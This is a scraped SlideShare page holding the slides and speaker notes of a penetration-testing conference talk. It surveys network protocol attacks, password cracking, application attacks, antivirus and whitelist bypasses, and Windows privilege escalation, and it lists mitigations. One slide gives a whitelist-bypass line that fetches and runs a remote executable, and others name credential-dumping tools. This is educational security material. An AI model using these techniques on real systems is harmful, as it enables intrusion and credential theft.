Your SlideShare is downloading. ×
0
INTRODUCTIONS
Scott Sutherland
 Principal Security Consultant @ NetSPI
 Twitter: @_nullbind
Karl Fosaaen
 Senior Securi...
OVERVIEW
• Why do companies pen test?
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End...
WHY DO COMPANIES PEN TEST?
• Compliance requirements
• Evaluate risks associated with an acquisition or
partnership
• Vali...
OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows E...
ATTACKING PROTOCOLS
• ARP: Address Resolution Protocol
• NBNS: NetBIOS Name Service
• SMB: Server Message Block
• PXE: Pre...
ATTACKING PROTOCOLS: ARP
Address
Resolution
Protocol
ATTACKING PROTOCOLS: ARP
• General
MAC to IP association
Layer 2
• Conditions
Independent of user action
Broadcast net...
ATTACKING PROTOCOLS: ARP
ATTACKING PROTOCOLS: ARP
Common mitigating controls:
• Dynamic ARP Inspection
• Port Security
• Static Routes (not recomme...
ATTACKING PROTOCOLS: NBNS / LLMNR
NetBIOS Name
Service
ATTACKING PROTOCOLS: NBNS
• General
 IP to hostname association
 Layer 5 / 7
• Constraints
 Dependent on user action
 ...
ATTACKING PROTOCOLS: NBNS
ATTACKING PROTOCOLS: NBNS
ATTACKING PROTOCOLS: NBNS
ATTACKING PROTOCOLS: NBNS
Common mitigating controls:
• Create a WPAD (Web Proxy Auto-Discovery)
server entry in DNS
• Dis...
ATTACKING PROTOCOLS: SMB
Server
Message
Block
ATTACKING PROTOCOLS: SMB
• General
SMB is the come back kid!
Layer 7
• Constraints
Dependent on user action
Any routab...
ATTACKING PROTOCOLS: SMB
ATTACKING PROTOCOLS: SMB
Historically SMB Relay has been used to:
• Execute arbitrary commands
• Obtain shells
Lately the ...
ATTACKING PROTOCOLS: SMB
Common mitigating controls:
• Enable packet signing to help prevent SMB Relay
attacks
• Apply rea...
ATTACKING PROTOCOLS: PXE
Preboot
eXecution
Environment
ATTACKING PROTOCOLS: PXE
• General
DHCP
• Attacks
Rogue PXE server
Command execution
Access to unencrypted drive image...
ATTACKING PROTOCOLS: PXE
Common mitigating controls:
• MAC/IP filters
• Limit PXE to specific networks
• Network Access Co...
ATTACKING PROTOCOLS: DTP
Dynamic
Trunking
Protocol
ATTACKING PROTOCOLS: DTP
Common mitigating controls:
• Use dedicated VLAN ID for all trunking ports
• Disable all unused p...
ATTACKING PROTOCOLS: DTP
• General
 802.1Q encapsulation is in use
 Layer 2
• Constraints
 Independent of user action
...
ATTACKING PROTOCOLS: DTP
ATTACKING PROTOCOLS: DTP
ATTACKING PROTOCOLS: DTP
ATTACKING PROTOCOLS: DTP
ATTACKING PROTOCOLS: DTP
Common mitigating controls:
• Use dedicated VLAN ID for all trunking ports
• Disable all unused p...
OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows E...
ATTACKING PASSWORDS
• Hashes and Cracking (Offline)
• Dictionary Attacks (Online)
• Dump in Cleartext!
ATTACKING PASSWORDS
Tool Function Year
Pass the Hash Passing Hashes 1997
Rainbow Tables Password Cracking 2000s
SMB Relay ...
ATTACKING PASSWORDS: DICTIONARY
• Online Vs. Offline Attacks
• Dictionary Attacks
Enumerate users
- Null SMB logins, RPC,...
ATTACKING PASSWORDS: HASHES
• What are hashes?
A non-reversible way of storing passwords
Operating systems and applicati...
ATTACKING PASSWORDS: HASHES
• How do we get hashes?
Cain and Abel
fgdump
Metasploit
Mimikatz
Databases
Config files
ATTACKING PASSWORDS: CRACKING
• Cracking Hashes
Rainbow Tables
John the Ripper
oclHashcat
CPU versus GPU
ATTACKING PASSWORDS: CRACKING
0
100
200
300
400
500
600
Minutes for Six Character Brute Force
CPU GPU
ATTACKING PASSWORDS: CRACKINGGPUCPU
ATTACKING PASSWORDS: CLEARTEXT
Common application configs
Reversible Formats
Find in files
Groups.xml
Unattend.xml
S...
OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows E...
ATTACKING APPLICATIONS: COMMON
• Default and weak passwords
• SQL injection
• RFI/web shells
• Web directory traversals
• ...
ATTACKING APPLICATIONS: BREAKOUTS
• Obtain a common dialog box
• Bypass folder path and file type restrictions
• Bypass fi...
OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows E...
BYPASSING EPP: ANTI-VIRUS
• Powershell Code Injection
• Execute off network share
• Clone resource tables
• Modify import ...
BYPASSING EPP: APP WHITE LIST
• Rename executables
• Execution via approved apps
- Powershell Code Injection
- Rundll32 my...
OVERVIEW
• Attacking Protocols
• Attacking Passwords
• Attacking Applications
• Bypassing End Point Protection
• Windows E...
WINDOWS ESCALATION: OVERVIEW
• Privilege Escalation Goals
• Local Privilege Escalation
• Domain Privilege Escalation
WINDOWS ESCALATION: GOALS
Local Escalation Goals
 Find clear text or reversible credentials with local administrative pri...
WINDOWS ESCALATION: LOCAL
Local Escalation
 *Clear text credentials in files, registry, over network
 Insecure service p...
WINDOWS ESCALATION: DOMAIN
Domain Escalation – Find DAs
 Check locally! (Processes,Tokens, Cachedump)
 Review active ses...
WINDOWS ESCALATION: DOMAIN
Domain Escalation – Impersonate DAs
 Dump passwords from memory with Mimikatz
 Migrate into t...
CONCLUSIONS
All can kind of be fixed
Most Networks
Kind of broken
Most Protocols
Kind of broken
Most Applications
Kind ...
ATTACK ALL THE LAYERS!
ANY QUESTIONS?
ATTACK ALL THE LAYERS!
Scott Sutherland
Principal Security Consultant
Twitter: @_nullbind
Karl Fosaaen
Senior Security ...
Secure360 - Attack All the Layers! Again!
Secure360 - Attack All the Layers! Again!
Upcoming SlideShare
Loading in...5
×

Secure360 - Attack All the Layers! Again!

410

Published on

This presentation is intended to provide an overview of vulnerabilities and attack techniques that are popular in penetration testing at the moment. This talk includes real-world examples of attacks that they use on a daily basis, and some reflections on what techniques have changed over the last year. Vulnerabilities related to the application, network, and server layers will all be covered along with current anti-virus bypass and privilege escalation techniques used by attackers and penetration testers. This presentation should be interesting to security professionals and system administrators looking for more insight into real world attacks.

More security blogs by the authors can be found @
https://www.netspi.com/blog/

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
410
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
30
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • Validation controls = ids/ips/waf incident response
  • These are protocols that are commonly targeted. However, there are many others:Address Resolution Protocol (ARP): Cain, ettercap, interceptor-ng, Subterfuge, easycredsNetBIOS Name Service (NBNS): MetaSploit and responder Link-local Multicast Name Resolution (LLMNR): MetaSploit and responder Pre-Execution Environment (PXE): MetaSploitDynamic Trunking Protocol (DTP): Yersinia Spanning-Tree Protocol (STP): Yersinia, ettercap (lamia plugin) Hot Stand-by Router Protocol (HSRP): Yersinia Dynamic Host Configuration Protocol (DHCP): Interceptor, MetaSploit, manual setup Domain Name Services (DNS): MetaSploit, ettercap, dsniff, zodiac, ADMIdPackVLAN Tunneling Protocol (VTP): Yersinia, voiphopper, or modprobe+ifconfig
  • Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • Go with what you like. 
  • Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • Windows Protocol- Kind of like a back up to DNS- Host file- DNS- NBNSRace condition Limited to broadcast network
  • Go with what you like. http basichttp_ntlmauthhttp_relaysmb
  • Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • In summary, an SMB Relay attack can be loosely defined as the process of relaying SMB authentication from one system to another via a man-in-the-middle (MITM) position. Based on my five whole minutes of wiki research I now know that the issues that allow smb attacks to be succesful were identified as a threat in the late 90’s. However, it wasn’t until 2001 that Sir Dystic publicly released a tool that could be used to perform practical attacks. Seven years later Microsoft got around to partially fixing the issue with a patch, but it only prevents attackers from relaying back to the originating system.I guess the good news is that SMB relay attacks can be prevented by enabling and requiring smb message signing, but the bad news is that most environments are configured in such a way that attackers can still relay authentication to other systems.2001 was a while ago, so I got out my calculator and did some hardcore math to figure out that this has been a well known and practiced attack for at least 11 years. During that time there have been many tools and projects dedicated to taking advantage of the attack technique. Some of the more popular ones include Metasploit, Squirtle, and ZackAttack.Anyway, let’s get back on track…
  • Image showing MITM
  • Go with what you like. http basichttp_ntlmauthhttp_relaysmb
  • Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • In summary, an SMB Relay attack can be loosely defined as the process of relaying SMB authentication from one system to another via a man-in-the-middle (MITM) position. Based on my five whole minutes of wiki research I now know that the issues that allow smb attacks to be succesful were identified as a threat in the late 90’s. However, it wasn’t until 2001 that Sir Dystic publicly released a tool that could be used to perform practical attacks. Seven years later Microsoft got around to partially fixing the issue with a patch, but it only prevents attackers from relaying back to the originating system.I guess the good news is that SMB relay attacks can be prevented by enabling and requiring smb message signing, but the bad news is that most environments are configured in such a way that attackers can still relay authentication to other systems.2001 was a while ago, so I got out my calculator and did some hardcore math to figure out that this has been a well known and practiced attack for at least 11 years. During that time there have been many tools and projects dedicated to taking advantage of the attack technique. Some of the more popular ones include Metasploit, Squirtle, and ZackAttack.Anyway, let’s get back on track…
  • Been an issue since the birth of the internet and hasn’t really gone away.ARP is a broadcast protocol used for IP to MAC relationshipsLimited to broadcast network- No encryption or validation allows for spoofingMITM Step 1 – tell server you are a clientMITM Step 2 - tell client you are the serverCan also broadcast as gateway to all systems on subnet, but your most likely not a router – so don’t do thatCan also dos very easily
  • the unauthorized switch can send DTP frames and form a trunk with the Company Switch. If the attacker can establish a trunk link to the Company switch, it receives traffic to all VLANs through the trunk because all VLANs are allowed on a trunk by default.
  • Image showing MITM
  • Image showing MITM
  • Image showing MITM
  • Image showing MITM
  • Touch on common tools and pitfalls (account lockouts)
  • Default and weak passwords for everythingTools: Nmap, Nessus, Web Scour, Manuals, GoogleSQL injectionTools: Manually, web scanners, SQL Ninja, SQL Map, MetasploitRFI/Web Shells (JBOSS, Tomcat, etc.)Tools: Metasploit, Fuzzdb, and other web shelleryWeb directory traversalsTools: Manually, web scanners, Fuzzdb, Metasploit, Critical Missing Patches (SEP etc)Tools: Metasploit, exploitdb exploits, etc
  • Execution via approved apps - Powershell Code Injection - Rundll32 - IEExecDirectory Exceptions - GACDisable ServicesPoisoning allowed file list and blocking updates via hosts filePoisoning updates
  • This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  • Localuser  Local AdministratorExcessive local group privileges (admin or power users)Cleartext credentialsSysprep (unattend.xml/ini/txt)Config files, scripts, logs, desktop foldersTech support calls filesWeak application configurations that allow: Restarting or reconfiguring servicesReplacing application files DLL pre or side loading Executable injection via poorly registered services C:\Program Files (x86) vs “C:\Program Files (x86)” Local and remote exploits (Metasploit: getsystem)
  • This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  • This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  • This is a non-linear process so be aware that some techniques can be used at many levels.These are the common escalation scenarios seen during penetration testing.
  • Yes it did.
  • Transcript of "Secure360 - Attack All the Layers! Again!"

    1. 1. INTRODUCTIONS Scott Sutherland  Principal Security Consultant @ NetSPI  Twitter: @_nullbind Karl Fosaaen  Senior Security Consultant @ NetSPI  Twitter: @kfosaaen We specialize in both things and stuff!
    2. 2. OVERVIEW • Why do companies pen test? • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation • Conclusions
    3. 3. WHY DO COMPANIES PEN TEST? • Compliance requirements • Evaluate risks associated with an acquisition or partnership • Validate preventative controls • Validate detective controls • Prioritize internal security initiatives • Proactively prevent breaches
    4. 4. OVERVIEW • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
    5. 5. ATTACKING PROTOCOLS • ARP: Address Resolution Protocol • NBNS: NetBIOS Name Service • SMB: Server Message Block • PXE: Preboot Execution Environment • DTP: Dynamic Trunking Protocol
    6. 6. ATTACKING PROTOCOLS: ARP Address Resolution Protocol
    7. 7. ATTACKING PROTOCOLS: ARP • General MAC to IP association Layer 2 • Conditions Independent of user action Broadcast network • Attacks MITM Monitoring MITM Injection DOS
    8. 8. ATTACKING PROTOCOLS: ARP
    9. 9. ATTACKING PROTOCOLS: ARP Common mitigating controls: • Dynamic ARP Inspection • Port Security • Static Routes (not recommended)
    10. 10. ATTACKING PROTOCOLS: NBNS / LLMNR NetBIOS Name Service
    11. 11. ATTACKING PROTOCOLS: NBNS • General  IP to hostname association  Layer 5 / 7 • Constraints  Dependent on user action  Broadcast Network  Windows Only • Attacks  MITM Monitoring  MITM Injection  DOS
    12. 12. ATTACKING PROTOCOLS: NBNS
    13. 13. ATTACKING PROTOCOLS: NBNS
    14. 14. ATTACKING PROTOCOLS: NBNS
    15. 15. ATTACKING PROTOCOLS: NBNS Common mitigating controls: • Create a WPAD (Web Proxy Auto-Discovery) server entry in DNS • Disable NBNS • Disable insecure authentication methods to help limit impact of exposed hashes • Enable packet signing to help prevent SMB Relay attacks
    16. 16. ATTACKING PROTOCOLS: SMB Server Message Block
    17. 17. ATTACKING PROTOCOLS: SMB • General SMB is the come back kid! Layer 7 • Constraints Dependent on user action Any routable network No connecting back to originating host • Attacks Command execution Shells..aaand shells
    18. 18. ATTACKING PROTOCOLS: SMB
    19. 19. ATTACKING PROTOCOLS: SMB Historically SMB Relay has been used to: • Execute arbitrary commands • Obtain shells Lately the community has been developing tools for doing things like: • LDAP queries • SQL queries • Exchange services • Mounting file systems
    20. 20. ATTACKING PROTOCOLS: SMB Common mitigating controls: • Enable packet signing to help prevent SMB Relay attacks • Apply really old patches like if you missed out on the last decade…
    21. 21. ATTACKING PROTOCOLS: PXE Preboot eXecution Environment
    22. 22. ATTACKING PROTOCOLS: PXE • General DHCP • Attacks Rogue PXE server Command execution Access to unencrypted drive images Shells..aaand shells
    23. 23. ATTACKING PROTOCOLS: PXE Common mitigating controls: • MAC/IP filters • Limit PXE to specific networks • Network Access Controls - NAC
    24. 24. ATTACKING PROTOCOLS: DTP Dynamic Trunking Protocol
    25. 25. ATTACKING PROTOCOLS: DTP Common mitigating controls: • Use dedicated VLAN ID for all trunking ports • Disable all unused ports and place them on a non routable VLAN • Configure all user ports as access ports to prevent trunk negotiation • Configure frames with two 8021Q headers • Configure strong VACLs
    26. 26. ATTACKING PROTOCOLS: DTP • General  802.1Q encapsulation is in use  Layer 2 • Constraints  Independent of user action  Trunking is set to enabled or auto on switch port • Attacks  Monitor network traffic for all VLANs, because all VLANs are allowed on a trunk by default  *Full VLAN hopping
    27. 27. ATTACKING PROTOCOLS: DTP
    28. 28. ATTACKING PROTOCOLS: DTP
    29. 29. ATTACKING PROTOCOLS: DTP
    30. 30. ATTACKING PROTOCOLS: DTP
    31. 31. ATTACKING PROTOCOLS: DTP Common mitigating controls: • Use dedicated VLAN ID for all trunking ports • Disable all unused ports and place them on a non routable VLAN • Configure all user ports as access ports to prevent trunk negotiation • Configure frames with two 8021Q headers • Configure strong VACLs
    32. 32. OVERVIEW • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
    33. 33. ATTACKING PASSWORDS • Hashes and Cracking (Offline) • Dictionary Attacks (Online) • Dump in Cleartext!
    34. 34. ATTACKING PASSWORDS Tool Function Year Pass the Hash Passing Hashes 1997 Rainbow Tables Password Cracking 2000s SMB Relay Relaying Captured Hashes 2001 John the Ripper Password Cracking 2001 NetNTLM.pl Cracking Network Hashes 2007 PTH Toolkit Pass all the Hashes 2008 Hashcat CPU and GPU Cracking 2010 WCE and Mimikatz Cleartext Windows Creds 2012
    35. 35. ATTACKING PASSWORDS: DICTIONARY • Online Vs. Offline Attacks • Dictionary Attacks Enumerate users - Null SMB logins, RPC, *SID BF, SNMP, LDAP, SharePoint, etc Attack! • Are users getting smarter? Sort of… - “Spring2014” meets password complexity requirements
    36. 36. ATTACKING PASSWORDS: HASHES • What are hashes? A non-reversible way of storing passwords Operating systems and applications Lots of types LM/NTLM  Network and Local  MD5  SHA  descrypt
    37. 37. ATTACKING PASSWORDS: HASHES • How do we get hashes? Cain and Abel fgdump Metasploit Mimikatz Databases Config files
    38. 38. ATTACKING PASSWORDS: CRACKING • Cracking Hashes Rainbow Tables John the Ripper oclHashcat CPU versus GPU
    39. 39. ATTACKING PASSWORDS: CRACKING 0 100 200 300 400 500 600 Minutes for Six Character Brute Force CPU GPU
    40. 40. ATTACKING PASSWORDS: CRACKINGGPUCPU
    41. 41. ATTACKING PASSWORDS: CLEARTEXT Common application configs Reversible Formats Find in files Groups.xml Unattend.xml Sysprep Registry WCE Mimikatz
    42. 42. OVERVIEW • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
    43. 43. ATTACKING APPLICATIONS: COMMON • Default and weak passwords • SQL injection • RFI/web shells • Web directory traversals • UNC path injection + SMB relay • Critical missing patches
    44. 44. ATTACKING APPLICATIONS: BREAKOUTS • Obtain a common dialog box • Bypass folder path and file type restrictions • Bypass file execution restrictions • Bypass file black/white lists • Access to native consoles and management tools • Downloading and use third party applications
    45. 45. OVERVIEW • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
    46. 46. BYPASSING EPP: ANTI-VIRUS • Powershell Code Injection • Execute off network share • Clone resource tables • Modify import tables • Pack files
    47. 47. BYPASSING EPP: APP WHITE LIST • Rename executables • Execution via approved apps - Powershell Code Injection - Rundll32 mydll,DLLMain@12 - IEExec http://x.x.x.x:8080/bypass.exe - cmd /c file.exe • Directory Exceptions • Disable Services • Poisoning updates and approved file lists
    48. 48. OVERVIEW • Attacking Protocols • Attacking Passwords • Attacking Applications • Bypassing End Point Protection • Windows Escalation
    49. 49. WINDOWS ESCALATION: OVERVIEW • Privilege Escalation Goals • Local Privilege Escalation • Domain Privilege Escalation
    50. 50. WINDOWS ESCALATION: GOALS Local Escalation Goals  Find clear text or reversible credentials with local administrative privileges  Get application to run commands as Administrator or LocalSystem Domain Escalation Goals  Find Domain Admins  Impersonate Domain Admins
    51. 51. WINDOWS ESCALATION: LOCAL Local Escalation  *Clear text credentials in files, registry, over network  Insecure service paths  DLL preloading  DLL and exe replacement  Binary planting in auto-run locations (reg and file system)  Modifying schedule tasks  *Local and remote exploits  Leverage local application like IIS, SQL Server etc  *UNC path injection + SMB Relay / Capture + crack
    52. 52. WINDOWS ESCALATION: DOMAIN Domain Escalation – Find DAs  Check locally! (Processes,Tokens, Cachedump)  Review active sessions - netsess  Review remote processes - tasklist  Service Principal Names (SPN) – get-spn  Scanning Remote Systems for NetBIOS Information - nbtscan  Pass the hash to other systems  PowerShell shell spraying  WINRM/WINRS shell spraying  Psexec shell spraying
    53. 53. WINDOWS ESCALATION: DOMAIN Domain Escalation – Impersonate DAs  Dump passwords from memory with Mimikatz  Migrate into the Domain Admin’s process  Steal Domain Admins delegation tokens with Incognito  Dump cached domain admin hashes with cachedump Relatively new techniques  PTH using Kerberos ticket
    54. 54. CONCLUSIONS All can kind of be fixed Most Networks Kind of broken Most Protocols Kind of broken Most Applications Kind of broken
    55. 55. ATTACK ALL THE LAYERS! ANY QUESTIONS?
    56. 56. ATTACK ALL THE LAYERS! Scott Sutherland Principal Security Consultant Twitter: @_nullbind Karl Fosaaen Senior Security Consultant Twitter: @kfosaaen
    1. A particular slide catching your eye?

      Clipping is a handy way to collect important slides you want to go back to later.

    ×